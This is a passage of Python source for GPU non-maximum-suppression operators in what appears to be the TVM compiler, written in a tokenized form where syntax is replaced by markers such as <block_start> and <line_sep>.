<block_start>bounds=valid_count[i]<if>return_indices<else>num_anchors<with_stmt>ib.if_scope(j<l>bounds)<block_start>src_offset=base_src_idx+j<times>box_data_length<with_stmt>ib.for_range(0 4 kind="unroll")<as>k<block_start>out_bboxes[base_bbox_idx+j<times>4+k]=data[src_offset+coord_start+k]<block_end><with_stmt>ib.for_range(0 num_features 
kind="unroll")<as>k<block_start>out_features[(base_features_idx+j<times>num_features+k)]=data[src_offset+coord_start+4+k]<block_end>out_scores[i<times>num_anchors+j]=data[src_offset+score_index]<if_stmt>id_index<ge>0<block_start>out_class_ids[i<times>num_anchors+j]=data[src_offset+id_index]<block_end>box_indices[i<times>num_anchors+j]=j<block_end><block_end><block_end><if_stmt>isinstance(max_output_size int)<block_start>max_output_size=tvm.tir.const(max_output_size)<block_end><def_stmt>calc_overlap i j k<block_start>offset_j=j<times>4<line_sep>offset_k=k<times>4<line_sep>base_bbox_idx=i<times>num_anchors<times>4<line_sep><return>calculate_overlap(out_bboxes base_bbox_idx+offset_j base_bbox_idx+offset_k )<block_end><def_stmt>on_new_valid_box ib tid num_current_valid_box i j# When return_indices is False, no need to populate box_indices <block_start><if_stmt>return_indices<block_start><with_stmt>ib.if_scope(tid+0<eq>0)<block_start>orig_idx=sorted_index[i<times>num_anchors+j]<line_sep>box_indices[i num_current_valid_box]=indices[i orig_idx]<block_end><block_end><block_end><def_stmt>on_new_invalidated_box i k<block_start><if_stmt>return_indices<is><false><and>id_index<ge>0<block_start>out_class_ids[i k]=-1.0<block_end><block_end><def_stmt>needs_bbox_check i j k<block_start><return>tvm.tir.any(force_suppress<g>0 id_index<l>0 out_class_ids[i k]<eq>out_class_ids[i j] )<block_end><return>_nms_loop(ib batch_size top_k iou_threshold max_output_size valid_count on_new_valid_box on_new_invalidated_box needs_bbox_check calc_overlap out_scores num_valid_boxes )<block_end><def_stmt>_fetch_score_ir data score axis<block_start>""" Fetch score from data. This routine is required for dynamic shape nms. 
"""<line_sep>batch_size=data.shape[0]<line_sep>num_anchors=data.shape[1]<line_sep>elem_length=data.shape[2]<line_sep>ib=tvm.tir.ir_builder.create()<line_sep>data=ib.buffer_ptr(data)<line_sep>score=ib.buffer_ptr(score)<with_stmt>ib.if_scope(num_anchors<g>0)<block_start>max_threads=int(tvm.target.Target.current(allow_none=<false>).max_num_threads)<line_sep>nthread_tx=max_threads<line_sep>nthread_bx=batch_size<times>num_anchors<floordiv>max_threads+1<line_sep>tx=te.thread_axis("threadIdx.x")<line_sep>bx=te.thread_axis("blockIdx.x")<line_sep>ib.scope_attr(tx "thread_extent" nthread_tx)<line_sep>ib.scope_attr(bx "thread_extent" nthread_bx)<line_sep>tid=bx<times>max_threads+tx<with_stmt>ib.if_scope(tid<l>batch_size<times>num_anchors)<block_start>score[tid]=data[tid<times>elem_length+axis]<block_end><block_end><return>ib.get()<block_end><def_stmt>_dispatch_sort scores ret_type="indices"<block_start>target=tvm.target.Target.current()<if_stmt>target<and>(can_use_thrust(target "tvm.contrib.thrust.sort")<or>can_use_rocthrust(target "tvm.contrib.thrust.sort"))<block_start><return>argsort_thrust(scores axis=1 is_ascend=<false> dtype="int32" ret_type=ret_type)<block_end><return>argsort(scores axis=1 is_ascend=<false> dtype="int32" ret_type=ret_type)<block_end><def_stmt>_get_sorted_indices data data_buf score_index score_shape<block_start>"""Extract a 1D score tensor from the packed input and do argsort on it."""<line_sep>score_buf=tvm.tir.decl_buffer(score_shape data.dtype "score_buf" data_alignment=8)<line_sep>score_tensor=te.extern([score_shape] [data] <lambda>ins outs:_fetch_score_ir(ins[0] outs[0] score_index ) dtype=[data.dtype] in_buffers=[data_buf] out_buffers=[score_buf] name="fetch_score" tag="fetch_score" )<line_sep><return>_dispatch_sort(score_tensor)<block_end><def_stmt>_run_nms data data_buf sort_tensor valid_count indices max_output_size iou_threshold force_suppress top_k coord_start id_index score_index return_indices <block_start>"""Run NMS using sorted 
scores."""<line_sep>sort_tensor_buf=tvm.tir.decl_buffer(sort_tensor.shape sort_tensor.dtype "sort_tensor_buf" data_alignment=8)<line_sep>valid_count_dtype="int32"<line_sep>valid_count_buf=tvm.tir.decl_buffer(valid_count.shape valid_count_dtype "valid_count_buf" data_alignment=4)<line_sep>indices_buf=tvm.tir.decl_buffer(indices.shape indices.dtype "indices_buf" data_alignment=8)<line_sep>batch_size=data.shape[0]<line_sep>num_anchors=data.shape[1]<line_sep># Number of extra features per box beyond coords, score, and id. num_features=data.shape[2]-6<if>id_index<ge>0<else>data.shape[2]-5<line_sep># output shapes bbox_shape=(batch_size num_anchors 4)<line_sep>score_shape=(batch_size num_anchors)<line_sep>class_id_shape=score_shape<line_sep>out_features_shape=(batch_size num_anchors num_features)<line_sep>box_indices_shape=score_shape<line_sep>num_valid_boxes_shape=(batch_size 1)<line_sep><return>te.extern([bbox_shape score_shape class_id_shape out_features_shape box_indices_shape num_valid_boxes_shape ] [data sort_tensor valid_count indices] <lambda>ins outs:nms_ir(ins[0] ins[1] ins[2] ins[3] outs[0] # sorted bbox outs[1] # sorted scores outs[2] # sorted class ids outs[3] # sorted box feats outs[4] # box_indices outs[5] # num_valid_boxes max_output_size iou_threshold force_suppress top_k coord_start id_index score_index return_indices ) dtype=[data.dtype "float32" "float32" "float32" "int32" "int32"] in_buffers=[data_buf sort_tensor_buf valid_count_buf indices_buf] name="nms" tag="nms" )<block_end><def_stmt>_concatenate_outputs out_bboxes out_scores out_class_ids out_features out_shape coord_start score_index id_index <block_start>"""Pack the results from NMS into a single 5D or 6D tensor."""<line_sep>batch_size=out_bboxes.shape[0]<line_sep>num_anchors=out_bboxes.shape[1]<line_sep>num_features=out_features.shape[2]<def_stmt>ir out_bboxes out_scores out_class_ids 
out<block_start>ib=tvm.tir.ir_builder.create()<line_sep>out_bboxes=ib.buffer_ptr(out_bboxes)<line_sep>out_scores=ib.buffer_ptr(out_scores)<line_sep>out_class_ids=ib.buffer_ptr(out_class_ids)<line_sep>out=ib.buffer_ptr(out)<with_stmt>ib.if_scope(num_anchors<g>0)<block_start>max_threads=int(tvm.target.Target.current(allow_none=<false>).max_num_threads)<line_sep>nthread_tx=max_threads<line_sep>nthread_bx=ceil_div(num_anchors nthread_tx)<line_sep>tx=te.thread_axis("threadIdx.x")<line_sep>bx=te.thread_axis("blockIdx.x")<line_sep>by=te.thread_axis("blockIdx.y")<line_sep>ib.scope_attr(tx "thread_extent" nthread_tx)<line_sep>ib.scope_attr(bx "thread_extent" nthread_bx)<line_sep>ib.scope_attr(by "thread_extent" batch_size)<line_sep>tid=bx<times>nthread_tx+tx<line_sep>i=by<with_stmt>ib.if_scope(tid<l>num_anchors)<block_start><with_stmt>ib.for_range(0 4 kind="unroll")<as>j<block_start>out[i tid coord_start+j]=out_bboxes[i tid j]<block_end><with_stmt>ib.for_range(0 num_features kind="unroll")<as>j<block_start>out[i tid coord_start+4+j]=out_features[i tid j]<block_end>out[i tid score_index]=out_scores[i tid]<if_stmt>id_index<ge>0<block_start>out[i tid id_index]=out_class_ids[i tid]<block_end><block_end><block_end><return>ib.get()<block_end><return>te.extern([out_shape] [out_bboxes out_scores out_class_ids] <lambda>ins outs:ir(ins[0] ins[1] ins[2] outs[0]) dtype=["float32"] name="nms_output_concat" tag="nms_output_concat" )<block_end><def_stmt>non_max_suppression data valid_count indices max_output_size=-1 iou_threshold=0.5 force_suppress=<false> top_k=-1 coord_start=2 score_index=1 id_index=0 return_indices=<true> invalid_to_bottom=<false> <block_start>"""Non-maximum suppression operator for object detection. Parameters ---------- data : tvm.te.Tensor 3-D tensor with shape [batch_size, num_anchors, elem_length]. The last dimension should be in format of [class_id, score, box_left, box_top, box_right, box_bottom]. It could be the second output out_tensor of get_valid_counts. 
valid_count : tvm.te.Tensor 1-D tensor for valid number of boxes. It could be the output valid_count of get_valid_counts. indices : tvm.te.Tensor 2-D tensor with shape [batch_size, num_anchors], represents the index of box in original data. It could be the third output out_indices of get_valid_counts. The values in the second dimension are like the output of arange(num_anchors) if get_valid_counts is not used before non_max_suppression. max_output_size : optional, tvm.te.Tensor or int Max number of output valid boxes for each instance. By default all valid boxes are returned. iou_threshold : optional, tvm.te.Tensor or float Non-maximum suppression threshold. force_suppress : optional, boolean Whether to suppress all detections regardless of class_id. top_k : optional, int Keep maximum top k detections before nms, -1 for no limit. coord_start : required, int Start index of the consecutive 4 coordinates. score_index : optional, int Index of the scores/confidence of boxes. id_index : optional, int index of the class categories, -1 to disable. return_indices : boolean Whether to return box indices in input data. invalid_to_bottom : optional, boolean Whether to move all valid bounding boxes to the top. Returns ------- out : tvm.te.Tensor 3-D tensor with shape [batch_size, num_anchors, elem_length]. Example -------- .. 
code-block:: python # An example to use nms dshape = (1, 5, 6) data = te.placeholder(dshape, name="data") valid_count = te.placeholder((dshape[0],), dtype="int32", name="valid_count") iou_threshold = 0.7 force_suppress = True top_k = -1 out = non_max_suppression(data=data, valid_count=valid_count, iou_threshold=iou_threshold, force_suppress=force_supress, top_k=top_k, return_indices=False) np_data = np.random.uniform(dshape) np_valid_count = np.array([4]) s = topi.generic.schedule_nms(out) f = tvm.build(s, [data, valid_count, out], "cuda") dev = tvm.cuda(0) tvm_data = tvm.nd.array(np_data, dev) tvm_valid_count = tvm.nd.array(np_valid_count, dev) tvm_out = tvm.nd.array(np.zeros(dshape, dtype=data.dtype), dev) f(tvm_data, tvm_valid_count, tvm_out) """<line_sep>data_buf=tvm.tir.decl_buffer(data.shape data.dtype "data_buf" data_alignment=8)<line_sep>sort_tensor=_get_sorted_indices(data data_buf score_index (data.shape[0] data.shape[1]))<line_sep>out_bboxes,out_scores,out_class_ids,out_features,box_indices,num_valid_boxes=_run_nms(data data_buf sort_tensor valid_count indices max_output_size iou_threshold force_suppress top_k coord_start id_index score_index return_indices )<if_stmt>return_indices<block_start><return>[box_indices num_valid_boxes]<block_end><return>_concatenate_outputs(out_bboxes out_scores out_class_ids out_features data.shape coord_start score_index id_index )<block_end><def_stmt>_get_valid_box_count scores score_threshold<block_start>batch_classes,num_boxes=scores.shape<def_stmt>searchsorted_ir scores valid_count<block_start>ib=tvm.tir.ir_builder.create()<line_sep>scores=ib.buffer_ptr(scores)<line_sep>valid_count=ib.buffer_ptr(valid_count)<line_sep>bx=te.thread_axis("blockIdx.x")<line_sep>tx=te.thread_axis("threadIdx.x")<line_sep>max_threads=int(tvm.target.Target.current(allow_none=<false>).max_num_threads)<with_stmt>ib.new_scope()<block_start>ib.scope_attr(bx "thread_extent" ceil_div(batch_classes max_threads))<line_sep>ib.scope_attr(tx 
"thread_extent" max_threads)<line_sep>tid=bx<times>max_threads+tx<with_stmt>ib.if_scope(tid<l>batch_classes)<block_start>binary_search(ib tid num_boxes scores score_threshold valid_count)<block_end><block_end><return>ib.get()<block_end>scores_buf=tvm.tir.decl_buffer(scores.shape scores.dtype "scores_buf" data_alignment=8)<line_sep><return>te.extern([(batch_classes )] [scores] <lambda>ins outs:searchsorted_ir(ins[0] outs[0]) dtype=["int32"] in_buffers=[scores_buf] name="searchsorted" tag="searchsorted" )<block_end><def_stmt>_collect_selected_indices_ir num_class selected_indices num_detections row_offsets out<block_start>batch_classes,num_boxes=selected_indices.shape<line_sep>ib=tvm.tir.ir_builder.create()<line_sep>selected_indices=ib.buffer_ptr(selected_indices)<line_sep>num_detections=ib.buffer_ptr(num_detections)<line_sep>row_offsets=ib.buffer_ptr(row_offsets)<line_sep>out=ib.buffer_ptr(out)<line_sep>max_threads=int(tvm.target.Target.current(allow_none=<false>).max_num_threads)<line_sep>nthread_tx=max_threads<line_sep>nthread_bx=ceil_div(num_boxes nthread_tx)<line_sep>nthread_by=batch_classes<line_sep>tx=te.thread_axis("threadIdx.x")<line_sep>bx=te.thread_axis("blockIdx.x")<line_sep>by=te.thread_axis("blockIdx.y")<line_sep>ib.scope_attr(tx "thread_extent" nthread_tx)<line_sep>ib.scope_attr(bx "thread_extent" nthread_bx)<line_sep>ib.scope_attr(by "thread_extent" nthread_by)<with_stmt>ib.new_scope()<block_start>idx=bx<times>nthread_tx+tx<line_sep>idy=cast(by "int64")<line_sep>batch_id=idy<floordiv>num_class<line_sep>class_id=idy%num_class<with_stmt>ib.if_scope(idx<l>num_detections[idy])<block_start>out[row_offsets[idy]+idx 0]=batch_id<line_sep>out[row_offsets[idy]+idx 1]=class_id<line_sep>out[row_offsets[idy]+idx 2]=cast(selected_indices[idy idx] "int64")<block_end><block_end><return>ib.get()<block_end><def_stmt>_collect_selected_indices_and_scores_ir selected_indices selected_scores num_detections row_offsets num_total_detections collected_indices collected_scores 
<block_start>batch_size,num_class=row_offsets.shape<line_sep>num_boxes=selected_indices.shape[1]<line_sep>ib=tvm.tir.ir_builder.create()<line_sep>selected_indices=ib.buffer_ptr(selected_indices)<line_sep>selected_scores=ib.buffer_ptr(selected_scores)<line_sep>num_detections=ib.buffer_ptr(num_detections)<line_sep>row_offsets=ib.buffer_ptr(row_offsets)<line_sep>num_total_detections=ib.buffer_ptr(num_total_detections)<line_sep>collected_indices=ib.buffer_ptr(collected_indices)<line_sep>collected_scores=ib.buffer_ptr(collected_scores)<line_sep>max_threads=int(tvm.target.Target.current(allow_none=<false>).max_num_threads)<line_sep>nthread_tx=max_threads<line_sep>nthread_bx=ceil_div(num_boxes nthread_tx)<line_sep>nthread_by=batch_size<times>num_class<line_sep>tx=te.thread_axis("threadIdx.x")<line_sep>bx=te.thread_axis("blockIdx.x")<line_sep>by=te.thread_axis("blockIdx.y")<line_sep>ib.scope_attr(tx "thread_extent" nthread_tx)<line_sep>ib.scope_attr(bx "thread_extent" nthread_bx)<line_sep>ib.scope_attr(by "thread_extent" nthread_by)<line_sep>zero=cast(0 "int64")<with_stmt>ib.new_scope()<block_start>idx=bx<times>nthread_tx+tx<line_sep>idy=cast(by "int64")<line_sep>batch_id=idy<floordiv>num_class<line_sep>class_id=idy%num_class<with_stmt>ib.if_scope(idx<l>num_detections[batch_id class_id])<block_start>offset=row_offsets[batch_id class_id]+idx<line_sep>collected_indices[batch_id offset 0]=class_id<line_sep>collected_indices[batch_id offset 1]=cast(selected_indices[idy idx] "int64")<line_sep>collected_scores[batch_id offset]=selected_scores[idy idx]<block_end><with_stmt>ib.else_scope()<block_start><with_stmt>ib.if_scope(idx<l>num_boxes)<block_start>offset=(num_total_detections[batch_id]+class_id<times>num_boxes-row_offsets[batch_id class_id]+idx-num_detections[batch_id class_id])<line_sep>collected_indices[batch_id offset 0]=zero<line_sep>collected_indices[batch_id offset 1]=zero<line_sep>collected_scores[batch_id 
offset]=0.0<block_end><block_end><block_end><return>ib.get()<block_end><def_stmt>all_class_non_max_suppression boxes scores max_output_boxes_per_class iou_threshold score_threshold output_format="onnx" <block_start>"""Non-maximum suppression operator for object detection, corresponding to ONNX NonMaxSuppression and TensorFlow combined_non_max_suppression. NMS is performed for each class separately. Parameters ---------- boxes : tvm.te.Tensor 3-D tensor with shape (batch_size, num_boxes, 4) scores: tvm.te.Tensor 3-D tensor with shape (batch_size, num_classes, num_boxes) max_output_boxes_per_class : int or tvm.te.Tensor, optional The maxinum number of output selected boxes per class iou_threshold : float or tvm.te.Tensor, optionaIl IoU test threshold score_threshold : float or tvm.te.Tensor, optional Score threshold to filter out low score boxes early output_format : str, optional "onnx" or "tensorflow", see below Returns ------- out : list of tvm.te.Tensor If `output_format` is "onnx", the output is two tensors. The first is `indices` of size `(batch_size * num_class* num_boxes , 3)` and the second is a scalar tensor `num_total_detection` of shape `(1,)` representing the total number of selected boxes. The three values in `indices` encode batch, class, and box indices. Rows of `indices` are ordered such that selected boxes from batch 0, class 0 come first, in descending of scores, followed by boxes from batch 0, class 1 etc. Out of `batch_size * num_class* num_boxes` rows of indices, only the first `num_total_detection` rows are valid. If `output_format` is "tensorflow", the output is three tensors, the first is `indices` of size `(batch_size, num_class * num_boxes , 2)`, the second is `scores` of size `(batch_size, num_class * num_boxes)`, and the third is `num_total_detection` of size `(batch_size,)` representing the total number of selected boxes per batch. The two values in `indices` encode class and box indices. 
Of num_class * num_boxes boxes in `indices` at batch b, only the first `num_total_detection[b]` entries are valid. The second axis of `indices` and `scores` are sorted within each class by box scores, but not across classes. So the box indices and scores for the class 0 come first in a sorted order, followed by the class 1 etc. """<line_sep>batch,num_class,num_boxes=scores.shape<line_sep>scores=reshape(scores (batch<times>num_class num_boxes))<line_sep>sorted_scores,sorted_indices=_dispatch_sort(scores ret_type="both")<line_sep>valid_count=_get_valid_box_count(sorted_scores score_threshold)<line_sep>selected_indices,selected_scores,num_detections=run_all_class_nms(boxes sorted_scores sorted_indices valid_count max_output_boxes_per_class iou_threshold _nms_loop return_scores=(output_format<eq>"tensorflow") )<if_stmt>output_format<eq>"onnx"<block_start>row_offsets,num_total_detections=exclusive_scan(num_detections return_reduction=<true> output_dtype="int64")<line_sep>selected_indices=collect_selected_indices(num_class selected_indices num_detections row_offsets _collect_selected_indices_ir)<line_sep><return>[selected_indices num_total_detections]<block_end>num_detections_per_batch=reshape(num_detections (batch num_class))<line_sep>row_offsets,num_total_detections=exclusive_scan(num_detections_per_batch return_reduction=<true> output_dtype="int64" axis=1)<line_sep>selected_indices,selected_scores=collect_selected_indices_and_scores(selected_indices selected_scores num_detections_per_batch row_offsets num_total_detections _collect_selected_indices_and_scores_ir )<line_sep><return>[selected_indices selected_scores num_total_detections]<block_end>